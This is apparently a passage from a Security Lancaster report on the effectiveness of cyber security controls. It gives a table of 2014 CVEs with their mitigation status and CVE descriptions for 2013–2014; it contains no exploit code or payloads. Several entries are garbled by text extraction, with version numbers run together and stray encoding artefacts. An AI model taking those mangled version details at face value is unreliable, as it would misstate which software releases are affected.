CVE-2014-3580 | y y y n n | Not Mitigated | Mitigated - Firewall, Anti-DOS, Patch Management
CVE-2014-3814 | n n n n n | Not Mitigated | Mitigated - Strong Passwords (User Access)
CVE-2014-3819 | n n n n n | Not Mitigated | Mitigated - Firewall, Anti-DOS, Firmware Updates
CVE-2014-3872 | n n n n n | Not Mitigated | Mitigated - Secure Configuration & Patch Management
CVE-2014-4044 | n n n n n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-4079 | y n y y n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4082 | y n y y n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4100 | y n y y n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4105 | y n y y n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4114 | y y y y n | Not Mitigated | Mitigated - Anti-Malware
CVE-2014-4127 | y n y y n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4130 | y n y y n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4132 | y n y y n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4133 | y n y y n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4141 | y n y y n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4481 | y y y y y | Not Mitigated | Mitigated - Patch Management, Anti-Malware
CVE-2014-4617 | y y n n n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-4631 | n n n n n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration
CVE-2014-6040 | n n n n n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-6105 | n n n n n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-6136 | n n n n n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-6363 | y n y y n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-6369 | y n y y | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-6378 | n n n n n n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-6487 | n n y n n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-7250 | n y y n n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-7927 | y y y y n | Not Mitigated | Mitigated - Firewall, Secure Configuration (Access Control), Patch Management
CVE-2014-7945 | y y y y n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-8447 | y y y y n | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management
CVE-2014-8638 | y y y y y | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-8835 | y y y y y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-9159 | y y y y y | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management [Time Delay]
CVE-2014-9163 | y y y y y | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management [Time Delay]
CVE-2014-9350 | y y y y n | Not Mitigated | Mitigated - Firewall, Anti-DOS, Firmware Updates
CVE-2014-9357 | n n n n n | Not Mitigated | Partially Mitigated - Patch Management, Anti-Malware, Secure Configuration


CVE Details

CVE-2013-0008
win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle window broadcast messages, which allows local users to gain privileges via a crafted application, aka "Win32k Improper Message Handling Vulnerability."

CVE-2013-0022
Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer LsGetTrailInfo Use After Free Vulnerability."

CVE-2013-0084
Directory traversal vulnerability in Microsoft SharePoint Server 2010 SP1 and SharePoint Foundation 2010 SP1 allows remote attackers to bypass intended read restrictions for content, and hijack user accounts, via a crafted URL, aka "SharePoint Directory Traversal Vulnerability."

CVE-2013-0140
SQL injection vulnerability in the Agent-Handler component in McAfee ePolicy Orchestrator (ePO) before 4.5.7 and 4.6.x before 4.6.6 allows remote attackers to execute arbitrary SQL commands via a crafted request over the Agent-Server communication channel.

CVE-2013-0149
The OSPF implementation in Cisco IOS 12.0 through 12.4 and 15.0 through 15.3, IOS-XE 2.x through 3.9.xS, ASA and PIX 7.x through 9.1, FWSM, NX-OS, and StarOS before 14.0.50488 does not properly validate Link State Advertisement (LSA) type 1 packets before performing operations on the LSA database, which allows remote attackers to cause a denial of service (routing disruption) or obtain sensitive packet information via a (1) unicast or (2) multicast packet, aka Bug IDs CSCug34485, CSCug34469, CSCug39762, CSCug63304, and CSCug39795.

CVE-2013-0172
Samba 4.0.x before 4.0.1, in certain Active Directory domain-controller configurations, does not properly interpret Access Control Entries that are based on an objectClass, which allows remote authenticated users to bypass intended restrictions on modifying LDAP directory objects by leveraging (1) objectClass access by a user, (2) objectClass access by a group, or (3) write access to an attribute.

CVE-2013-0174
The external node classifier (ENC) API in Foreman before 1.1 allows remote attackers to obtain the hashed root password via an API request.

CVE-2013-0199
The default LDAP ACIs in FreeIPA 3.0 before 3.1.2 do not restrict access to the (1) ipaNTTrustAuthIncoming and (2) ipaNTTrustAuthOutgoing attributes, which allow remote attackers to obtain the Cross-Realm Kerberos Trust key via unspecified vectors.

CVE-2013-0253
The default configuration of Apache Maven 3.0.4, when using Maven Wagon 2.1, disables SSL certificate checks, which allows remote attackers to spoof servers via a man-in-the-middle (MITM) attack.

CVE-2013-0270
OpenStack Keystone Grizzly before 2013.1, Folsom, and possibly earlier allows remote attackers to cause a denial of service (CPU and memory consumption) via a large HTTP request, as demonstrated by a long tenant name when requesting a token.

CVE-2013-0481
The console in IBM Sterling B2B Integrator 5.1 and 5.2 and Sterling File Gateway 2.1 and 2.2 allows remote attackers to read stack traces by triggering (1) an error or (2) an exception.

CVE-2013-0598
Cross-site request forgery (CSRF) vulnerability in the Web Client in IBM Rational ClearQuest 7.1 before 7.1.2.12, 8.0 before 8.0.0.8, and 8.0.1 before 8.0.1.1 allows remote attackers to hijack the authentication of arbitrary users.

CVE-2013-0619
Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and 11.x before 11.0.1 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-1530, CVE-2013-0601, CVE-2013-0605, CVE-2013-0616, CVE-2013-0620, and CVE-2013-0623.

CVE-2013-0633
Buffer overflow in Adobe Flash Player before 10.3.183.51 and 11.x before 11.5.502.149 on Windows and Mac OS X, before 10.3.183.51 and 11.x before 11.2.202.262 on Linux, before 11.1.111.32 on Android 2.x and 3.x, and before 11.1.115.37 on Android 4.x allows remote attackers to execute arbitrary code via crafted SWF content, as exploited in the wild in February 2013.

CVE-2013-0649
Use-after-free vulnerability in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x; Adobe AIR before 3.6.0.597; and Adobe AIR SDK before 3.6.0.599 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2013-0644 and CVE-2013-1374.

CVE-2013-0746
Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 10.x before 10.0.12 and 17.x before 17.0.2, and SeaMonkey before 2.15 do not properly implement quickstubs that use the jsval data type for their return values, which allows remote attackers to execute arbitrary code or cause a denial of service (compartment mismatch and application crash) via crafted JavaScript code that is not properly handled during garbage collection.

CVE-2013-0753Use-after-free vulnerability in theserializeToStream implementation x000Din the XMLSerializer component in MozillaFirefox before 180 Firefox x000D ESR10x before 10012 and 17x before1702 Thunderbird before x000D 1702Thunderbird ESR 10x before 10012 and17x before 1702 x000D and SeaMonkeybefore 215 allows remote attackers toexecute arbitrary x000D code via craftedweb content

CVE-2013-0787Use-after-free vulnerability in thensEditorIsPreformatted function x000Din editorlibeditorbasensEditorcppin Mozilla Firefox before x000D1902 Firefox ESR 17x before 1704Thunderbird before 1704 x000DThunderbird ESR 17x before 1704 andSeaMonkey before 2161 allows x000Dremote attackers to execute arbitrarycode via vectors involving an x000DexecCommand call

CVE-2013-0909The XSS Auditor in Google Chrome before2501364152 allows remote attackers toobtain sensitive HTTP Referer informationvia unspecified vectors

CVE-2013-1035The iTunes ActiveX control in Apple iTunesbefore 111 allows remote x000D attackersto execute arbitrary code or cause a denialof service x000D (memory corruption) viaa crafted web site

CVE-2013-1102The Wireless Intrusion Prevention System(wIPS) component on Cisco x000DWireless LAN Controller (WLC) deviceswith software 70 before x000D 70235071 and 72 before 721100 and 73before 731010 x000D allows remoteattackers to cause a denial of service(device reload) x000D via crafted IPpackets aka Bug ID CSCtx80743

CVE-2013-1140The XML parser in Cisco SecurityMonitoring Analysis and Response x000DSystem (MARS) allows remote attackers toread arbitrary files via an x000D externalentity declaration in conjunction with anentity reference x000D related to an XMLExternal Entity (XXE) issue aka Bug IDCSCue55093

CYBER SECURITY CONTROLS EFFECTIVENESS — Security Lancaster    Page 19 of 28

CVE-2013-1144: Memory leak in the IKEv1 implementation in Cisco IOS 15.1 allows remote attackers to cause a denial of service (memory consumption) via unspecified (1) IPv4 or (2) IPv6 IKE packets, aka Bug ID CSCth81055.

CVE-2013-1153: Cross-site request forgery (CSRF) vulnerability in the web interface in Cisco Prime Infrastructure allows remote attackers to hijack the authentication of arbitrary users, aka Bug ID CSCue84676.

CVE-2013-1181: Cisco NX-OS on Nexus 5500 devices 4.x and 5.x before 5.0(3)N2(2), Nexus 3000 devices 5.x before 5.0(3)U3(2), and Unified Computing System (UCS) 6200 devices before 2.0(1w) allows remote attackers to cause a denial of service (device reload) by sending a jumbo packet to the management interface, aka Bug IDs CSCtx17544, CSCts10593, and CSCtx95389.

CVE-2013-1303: Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability", a different vulnerability than CVE-2013-1304 and CVE-2013-1338.

CVE-2013-1384: Adobe Shockwave Player before 12.0.2.122 allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-1386.

CVE-2013-1388: Unspecified vulnerability in Adobe ColdFusion 9.0 before Update 10, 9.0.1 before Update 9, 9.0.2 before Update 4, and 10 before Update 9 allows attackers to obtain administrator-console access via unknown vectors.

CVE-2013-1450: Microsoft Internet Explorer 8 and 9, when the Proxy Settings configuration has the same Proxy address and Port values in the HTTP and Secure rows, does not properly reuse TCP sessions to the proxy server, which allows remote attackers to obtain sensitive information intended for a specific host via a crafted HTML document that triggers many HTTPS requests and then triggers an HTTP request to that host, as demonstrated by reading a Cookie header, aka MSRC 12096gd.

CVE-2013-1472: Unspecified vulnerability in the JavaFX component in Oracle Java SE JavaFX 2.2.4 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than other CVEs listed in the February 2013 CPU.

CVE-2013-1553: Unspecified vulnerability in the Oracle Web Services Manager component in Oracle Fusion Middleware 11.1.1.6.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Web Services Security.

CVE-2013-1620: The TLS implementation in Mozilla Network Security Services (NSS) does not properly consider timing side-channel attacks on a noncompliant MAC check operation during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, a related issue to CVE-2013-0169.

CVE-2013-1627: Absolute path traversal vulnerability in NTWebServer.exe in Indusoft Studio 7.0 and earlier and Advantech Studio 7.0 and earlier allows remote attackers to read arbitrary files via a full pathname in an argument to the sub_401A90 CreateFileW function.

CVE-2013-1638: Opera before 12.13 allows remote attackers to execute arbitrary code via crafted clipPaths in an SVG document.

CVE-2013-1669: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 21.0 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2013-1676: The SelectionIterator::GetNextSegment function in Mozilla Firefox before 21.0, Firefox ESR 17.x before 17.0.6, Thunderbird before 17.0.6, and Thunderbird ESR 17.x before 17.0.6 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds read) via unspecified vectors.

CVE-2013-1700: The Mozilla Maintenance Service in Mozilla Firefox before 22.0 on Windows does not properly handle inability to launch the Mozilla Updater executable file, which allows local users to gain privileges via vectors involving placement of a Trojan horse executable file at an arbitrary location.

CVE-2013-1734: Cross-site request forgery (CSRF) vulnerability in attachment.cgi in Bugzilla 2.x, 3.x, and 4.0.x before 4.0.11; 4.1.x and 4.2.x before 4.2.7; and 4.3.x and 4.4.x before 4.4.1 allows remote attackers to hijack the authentication of arbitrary users for requests that commit an attachment change via an update action.

CVE-2013-1777: The JMX Remoting functionality in Apache Geronimo 3.x before 3.0.1, as used in IBM WebSphere Application Server (WAS) Community Edition 3.0.0.3 and other products, does not properly implement the RMI classloader, which allows remote attackers to execute arbitrary code by using the JMX connector to send a crafted serialized object.

CVE-2013-2319: FileMaker Pro before 12 and Pro Advanced before 12 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2013-2340: Unspecified vulnerability on the HP ProCurve JCA, JCB, JDA, JDB, JEA, JFA, JFB, JFC, JGA, 658250-B21, and 658247-B21; HP 3COM routers and switches; and HP H3C routers and switches allows remote attackers to execute arbitrary code or obtain sensitive information via unknown vectors.

CVE-2013-2350: Unspecified vulnerability in HP Storage Data Protector 6.2X allows remote attackers to execute arbitrary code or cause a denial of service via unknown vectors, aka ZDI-CAN-1897.

CVE-2013-2492: Stack-based buffer overflow in Firebird 2.1.3 through 2.1.5 before 18514, and 2.5.1 through 2.5.3 before 26623, on Windows allows remote attackers to execute arbitrary code via a crafted packet to TCP port 3050, related to a missing size check during extraction of a group number from CNCT information.

CVE-2013-2507: Multiple cross-site scripting (XSS) vulnerabilities in the Brother MFC-9970CDW printer with firmware G (1.03) allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter to admin/log_to_net.html or (2) kind parameter to fax/copy_settings.html, a different vulnerability than CVE-2013-2670 and CVE-2013-2671.

CVE-2013-2736: Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11.x before 11.0.03 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-2718, CVE-2013-2719, CVE-2013-2720, CVE-2013-2721, CVE-2013-2722, CVE-2013-2723, CVE-2013-2725, CVE-2013-2726, CVE-2013-2731, CVE-2013-2732, CVE-2013-2734, CVE-2013-2735, CVE-2013-3337, CVE-2013-3338, CVE-2013-3339, CVE-2013-3340, and CVE-2013-3341.

CVE-2013-2780: Siemens SIMATIC S7-1200 PLCs 2.x and 3.x allow remote attackers to cause a denial of service (defect-mode transition and control outage) via crafted packets to UDP port 161 (aka the SNMP port).

CVE-2013-2803: ProSoft RadioLinx ControlScape before 6.00.040 uses a deficient PRNG algorithm and seeding strategy for passphrases, which makes it easier for remote attackers to obtain access via a brute-force attack.

CVE-2013-2824: Schneider Electric StruxureWare SCADA Expert Vijeo Citect 7.40, Vijeo Citect 7.20 through 7.30SP1, CitectSCADA 7.20 through 7.30SP1, StruxureWare PowerSCADA Expert 7.30 through 7.30SR1, and PowerLogic SCADA 7.20 through 7.20SR1 do not properly handle exceptions, which allows remote attackers to cause a denial of service via a crafted packet.

CVE-2013-2826: WellinTech KingSCADA before 3.1.2, KingAlarm&Event before 3.1, and KingGraphic before 3.1.2 perform authentication on the KAEClientManager console rather than on the server, which allows remote attackers to bypass intended access restrictions and discover credentials via a crafted packet to TCP port 8130.

CVE-2013-2920: The DoResolveRelativeHost function in url/url_canon_relative.cc in Google Chrome before 30.0.1599.66 allows remote attackers to cause a denial of service (out-of-bounds read) via a relative URL containing a hostname, as demonstrated by a protocol-relative URL beginning with a www.google.com substring.

CVE-2013-3064: Open redirect vulnerability in ui/dynamic/unsecured.html in Linksys EA6500 with firmware 1.1.28.147876 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the target parameter.

CVE-2013-3116: Microsoft Internet Explorer 7 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2013-3137: Microsoft FrontPage 2003 SP3 does not properly parse DTDs, which allows remote attackers to obtain sensitive information via crafted XML data in a FrontPage document, aka "XML Disclosure Vulnerability".

CVE-2013-3194: Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2013-3199: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2013-3201: Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2013-3203, CVE-2013-3206, CVE-2013-3207, and CVE-2013-3209.

CVE-2013-3206: Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2013-3201, CVE-2013-3203, CVE-2013-3207, and CVE-2013-3209.

CVE-2013-3280: EMC RSA Authentication Agent 7.1.x before 7.1.2 for Web for Internet Information Services has a fail-open design, which allows remote attackers to bypass intended access restrictions via vectors that trigger an agent crash.

CVE-2013-3387: Cisco Prime Central for Hosted Collaboration Solution (HCS) Assurance 8.6 and 9.x before 9.2(1) allows remote attackers to cause a denial of service (disk consumption) via a flood of TCP packets to port 5400, leading to large error-log files, aka Bug ID CSCua42724.

CVE-2013-3417: The administrative web interface in Cisco Video Surveillance Operations Manager does not properly perform authentication, which allows remote attackers to watch video feeds via a crafted URL, aka Bug ID CSCtg72262.

CVE-2013-3632: The Cron service in rpc.php in OpenMediaVault allows remote authenticated users to execute cron jobs as arbitrary users and execute arbitrary commands via the username parameter.

CVE-2013-3656: Cybozu Office 9.1.0 and earlier does not properly manage sessions, which allows remote attackers to bypass authentication by leveraging knowledge of a login URL.

CVE-2013-3856: Microsoft Word 2003 SP3 and Word Viewer allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability".

CVE-2013-3860: Microsoft .NET Framework 2.0 SP2, 3.5, 3.5 SP1, 3.5.1, 4, and 4.5 does not properly parse a DTD during XML digital-signature validation, which allows remote attackers to cause a denial of service (application crash or hang) via a crafted signed XML document, aka "Entity Expansion Vulnerability".

CVE-2013-3893: Use-after-free vulnerability in the SetMouseCapture implementation in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code via crafted JavaScript strings, as demonstrated by use of an ms-help: URL that triggers loading of hxds.dll.

CVE-2013-3897: Use-after-free vulnerability in the CDisplayPointer class in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted JavaScript code that uses the onpropertychange event handler, as exploited in the wild in September and October 2013, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2013-3900: The WinVerifyTrust function in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 does not properly validate PE file digests during Authenticode signature verification, which allows remote attackers to execute arbitrary code via a crafted PE file, aka "WinVerifyTrust Signature Validation Vulnerability".

CVE-2013-3905: Microsoft Outlook 2007 SP3, 2010 SP1 and SP2, 2013, and 2013 RT does not properly expand metadata contained in S/MIME certificates, which allows remote attackers to obtain sensitive network configuration and state information via a crafted certificate in an e-mail message, aka "S/MIME AIA Vulnerability".

CVE-2013-4223: The Gentoo Nullmailer package before 1.11-r2 uses world-readable permissions for /etc/nullmailer/remotes, which allows local users to obtain SMTP authentication credentials by reading the file.

CVE-2013-4436: The default configuration for salt-ssh in Salt (aka SaltStack) 0.17.0 does not validate the SSH host key of requests, which allows remote attackers to have unspecified impact via a man-in-the-middle (MITM) attack.

CVE-2013-4478: Sup before 0.13.2.1 and 0.14.x before 0.14.1.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the filename of an email attachment.

CVE-2013-4529: Buffer overflow in hw/pci/pcie_aer.c in QEMU before 1.7.2 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a large log_num value in a savevm image.

CVE-2013-4555: Cross-site request forgery (CSRF) vulnerability in ecrire/action/logout.php in SPIP before 2.1.24 allows remote attackers to hijack the authentication of arbitrary users for requests that logout the user via unspecified vectors.

CVE-2013-4776: NETGEAR ProSafe GS724Tv3 and GS716Tv2 with firmware 5.4.1.13 and earlier, GS748Tv4 5.4.1.14, and GS510TP 5.0.4.4 allows remote attackers to cause a denial of service (reboot or crash) via a crafted HTTP request to /filesystem.

CVE-2013-4782: The Supermicro BMC implementation allows remote attackers to bypass authentication and execute arbitrary IPMI commands by using cipher suite 0 (aka cipher zero) and an arbitrary password.

CVE-2013-5057: hxds.dll in Microsoft Office 2007 SP3 and 2010 SP1 and SP2 does not implement the ASLR protection mechanism, which makes it easier for remote attackers to execute arbitrary code via a crafted COM component on a web site that is visited with Internet Explorer, as exploited in the wild in December 2013, aka "HXDS ASLR Vulnerability".

CVE-2013-5369: IBM SPSS Analytical Decision Management 6.1 before IF1, 6.2 before IF1, and 7.0 before FP1 IF6 might allow remote attackers to execute arbitrary code by deploying and accessing a service.

CVE-2013-5428: IBM WebSphere DataPower XC10 appliances 2.5.0 do not require authentication for all administrative actions, which allows remote attackers to cause a denial of service via unspecified vectors.

CVE-2013-5431: Open redirect vulnerability in IBM Tivoli Federated Identity Manager (TFIM) 6.1.1 before IF 15, 6.2.0 before IF 14, and 6.2.1 and 6.2.2 before IF 8, and Tivoli Federated Identity Manager Business Gateway (TFIMBG) 6.1.1 before IF 15, 6.2.0 before IF 14, and 6.2.1 and 6.2.2 before IF 8, allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.

CVE-2013-5494: Cross-site request forgery (CSRF) vulnerability in the web framework in Cisco Unified MeetingPlace Solution, as used in Unified MeetingPlace Web Conferencing and Unified MeetingPlace, allows remote attackers to hijack the authentication of arbitrary users, aka Bug IDs CSCui45209 and CSCui44674.

CVE-2013-5507: The IPsec implementation in Cisco Adaptive Security Appliance (ASA) Software 9.1 before 9.1(1.7), when an IPsec VPN tunnel is enabled, allows remote attackers to cause a denial of service (device reload) via a (1) ICMP or (2) ICMPv6 packet that is improperly handled during decryption, aka Bug ID CSCue18975.

CVE-2013-5536: Cisco Secure Access Control System (ACS) does not properly implement an incoming-packet firewall rule, which allows remote attackers to cause a denial of service (process crash) via a flood of crafted packets, aka Bug ID CSCui51521.

CVE-2013-5559: Buffer overflow in the Active Template Library (ATL) framework in the VPNAPI COM module in Cisco AnyConnect Secure Mobility Client 2.x allows user-assisted remote attackers to execute arbitrary code via a crafted HTML document, aka Bug ID CSCuj58139.

CVE-2013-5561: The Safe Search enforcement feature in Cisco Adaptive Security Appliance (ASA) CX Context-Aware Security Software does not properly perform filtering, which allows remote attackers to bypass intended policy restrictions via unspecified vectors, aka Bug ID CSCui94622.

CVE-2013-5751: Directory traversal vulnerability in SAP NetWeaver 7.x allows remote attackers to read arbitrary files via unspecified vectors.

CVE-2013-5757: Absolute path traversal vulnerability in Yealink VoIP Phone SIP-T38G allows remote authenticated users to read arbitrary files via a full pathname in the dumpConfigFile function in the command parameter to cgi-bin/cgiServer.exx.

CVE-2013-5828: Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Enterprise Manager Grid Control EM Base Platform 10.2.0.5 and 11.1.0.1, EM DB Control 11.1.0.7, 11.2.0.2, and 11.2.0.3, and EM Plugin for DB 12.1.0.2 and 12.1.0.3 allows remote attackers to affect integrity via unknown vectors related to Storage Management.

CVE-2013-6167: Mozilla Firefox through 27 sends HTTP Cookie headers without first validating that they have the required character-set restrictions, which allows remote attackers to conduct the equivalent of a persistent Logout CSRF attack via a crafted parameter that forces a web application to set a malformed cookie within an HTTP response.

CVE-2013-6188: Cross-site request forgery (CSRF) vulnerability in HP System Management Homepage (SMH) 7.1 through 7.2.2 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.

CVE-2013-6284: Unspecified vulnerability in the Statutory Reporting for Insurance (FS SR) component in the Financial Services module for SAP ERP Central Component (ECC) allows attackers to execute arbitrary code via unspecified vectors, related to a "code injection vulnerability".

CVE-2013-6396: The OpenStack Python client library for Swift (python-swiftclient) 1.0 through 1.9.0 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2013-6475: Multiple integer overflows in (1) OPVPOutputDev.cxx and (2) oprs/OPVPSplash.cxx in the pdftoopvp filter in CUPS and cups-filters before 1.0.47 allow remote attackers to execute arbitrary code via a crafted PDF file, which triggers a heap-based buffer overflow.

CVE-2013-6660: The drag-and-drop implementation in Google Chrome before 33.0.1750.117 does not properly restrict the information in WebDropData data structures, which allows remote attackers to discover full pathnames via a crafted web site.

CVE-2013-6699: The Control and Provisioning of Wireless Access Points (CAPWAP) protocol implementation on Cisco Wireless LAN Controller (WLC) devices allows remote attackers to cause a denial of service via a crafted CAPWAP packet that triggers a buffer over-read, aka Bug ID CSCuh81880.

CVE-2013-6702: The management implementation on Cisco ONS 15454 controller cards with software 9.8 and earlier allows remote attackers to cause a denial of service (card reset) via crafted packets, aka Bug ID CSCtz50902.

CVE-2013-6979: The VTY authentication implementation in Cisco IOS XE 03.02.xx.SE and 03.03.xx.SE incorrectly relies on the Linux-IOS internal-network configuration, which allows remote attackers to bypass authentication by leveraging access to a 192.168.x.2 source IP address, aka Bug ID CSCuj90227.

CVE-2013-6994: OpenText Exceed OnDemand (EoD) 8 transmits the session ID in cleartext, which allows remote attackers to perform session fixation attacks by sniffing the network.

CVE-2013-7004: D-Link DSR-150 with firmware before 1.08B44, DSR-150N with firmware before 1.05B64, DSR-250 and DSR-250N with firmware before 1.08B44, and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 have a hardcoded account of username gkJ9232xXyruTRmY, which makes it easier for remote attackers to obtain access by leveraging knowledge of the username.

CVE-2013-7043: Multiple cross-site request forgery (CSRF) vulnerabilities on Cisco Scientific Atlanta DPR2320R2 routers with software 2.0.2r1262-090417 allow remote attackers to hijack the authentication of administrators for requests that (1) change a password via the Password parameter to goform/RgSecurity, (2) reboot the device via the Restart parameter to goform/restart, (3) modify Wi-Fi settings, as demonstrated by the WpaPreSharedKey parameter to goform/wlanSecurity, or (4) modify parental controls via the ParentalPassword parameter to goform/RgParentalBasic.

CVE-2013-7389: Multiple cross-site scripting (XSS) vulnerabilities in D-Link DIR-645 Router (Rev. A1) with firmware before 1.04B11 allow remote attackers to inject arbitrary web script or HTML via the (1) deviceid parameter to parentalcontrols/bind.php, (2) RESULT parameter to info.php, or (3) receiver parameter to bsc_sms_send.php.

CVE-2014-0001: Buffer overflow in client/mysql.cc in Oracle MySQL and MariaDB before 5.5.35 allows remote database servers to cause a denial of service (crash) and possibly execute arbitrary code via a long server version string.

CVE-2014-0035The SymmetricBinding in Apache CXFbefore 2613 and 27x before 2710when EncryptBeforeSigning is enabledand the UsernameToken policy is set toan EncryptedSupportingToken transmitsthe UsernameToken in cleartext whichallows remote attackers to obtain sensitiveinformation by sniffing the network

CVE-2014-0160The (1) TLS and (2) DTLSimplementations in OpenSSL 101 before101g do not properly handle HeartbeatExtension packets which allows remoteattackers to obtain sensitive informationfrom process memory via crafted packetsthat trigger a buffer over-read asdemonstrated by reading private keysrelated to d1 bothc and t1 libc aka theHeartbleed bug

CVE-2014-0207The cdf read short sector function in cdfcin file before 519 as used in the Fileinfocomponent in PHP before 5430 and 55xbefore 5514 allows remote attackers tocause a denial of service (assertion failureand application exit) via a crafted CDF file

CVE-2014-0259rdquoMicrosoft Word 2007 SP3 and OfficeCompatibility Pack SP3 allow remoteattackers to execute arbitrary code or causea denial of service (memory corruption) viaa crafted Office document aka rdquordquoWordMemory Corruption Vulnerabilityrdquordquordquo

CVE-2014-0266rdquoThe XMLHTTP ActiveX controls in XMLCore Services 30 in Microsoft WindowsXP SP2 and SP3 Windows Server 2003SP2 Windows Vista SP2 Windows Server2008 SP2 and R2 SP1 Windows 7 SP1Windows 8 Windows 81 Windows Server2012 Gold and R2 and Windows RT Goldand 81 allow remote attackers to bypass theSame Origin Policy via a web page that isvisited in Internet Explorer aka rdquordquoMSXMLInformation Disclosure Vulnerabilityrdquordquordquo

CVE-2014-0294rdquoMicrosoft Forefront Protection 2010for Exchange Server does not properlyparse e-mail content which might allowremote attackers to execute arbitrarycode via a crafted message aka rdquordquoRCEVulnerabilityrdquordquordquo

